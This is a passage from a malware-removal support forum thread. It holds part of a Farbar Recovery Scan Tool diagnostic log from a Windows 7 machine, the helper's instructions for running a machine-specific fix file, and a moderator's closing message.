Description: 80070005EventSystem.EventSubscription{6B3B7FCC-8870-4356-B799-369B66E9E2D1}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}

Error: (01/26/2016 02:58:19 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/24/2016 02:45:42 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/24/2016 02:39:15 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (01/30/2016 12:15:57 PM) (Source: Dhcp) (EventID: 1002) (User: )
Description: The IP address lease 10.0.0.10 for the Network Card with network address 001E65142DE0 has been denied by the DHCP server 192.168.1.254 (The DHCP Server sent a DHCPNACK message).

Error: (01/29/2016 05:57:29 PM) (Source: ssidrv) (EventID: 26) (User: )
Description: Failed to set monitor event rule.

Error: (01/29/2016 05:38:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 115.31.0.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/29/2016 05:37:42 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/29/2016 05:37:42 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/29/2016 05:36:50 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY59

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/29/2016 05:31:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: ConfigFree Service%%1053

Error: (01/29/2016 05:31:49 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: 30000ConfigFree Service

Error: (01/29/2016 05:28:52 PM) (Source: ssidrv) (EventID: 26) (User: )
Description: Failed to set monitor event rule.

Error: (01/29/2016 05:24:22 PM) (Source: Dhcp) (EventID: 1002) (User: )
Description: The IP address lease 10.236.153.51 for the Network Card with network address 001E65142DE0 has been denied by the DHCP server 10.0.0.1 (The DHCP Server sent a DHCPNACK message).


CodeIntegrity:
===================================
  Date: 2016-01-30 12:35:59.759
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:59.556
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:59.228
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:58.885
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:58.495
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:58.230
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:57.855
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:57.653
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:15.566
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-30 12:35:15.230
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core2 Duo CPU P7350 @ 2.00GHz
Percentage of memory in use: 43%
Total physical RAM: 4093.04 MB
Available physical RAM: 2331 MB
Total Virtual: 8393.36 MB
Available Virtual: 6361.18 MB

==================== Drives ================================

Drive c: (TI100343V0F) (Fixed) (Total:454.05 GB) (Free:335.62 GB) NTFS ==>[drive with boot components (obtained from BCD)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 008CB0AA)
Partition 1: (Not Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Active) - (Size=454.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=10.2 GB) - (Type=17)

==================== End of Addition.txt ============================


Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine.
Running it on another one may cause damage and render the system unstable.

Download attached fixlist.txt file and save it to the Desktop:
 
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please attach it to your reply.

fixlist.txt


  • 2 weeks later...
  • Root Admin

Glad we could help. :)

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!


This topic is now closed to further replies.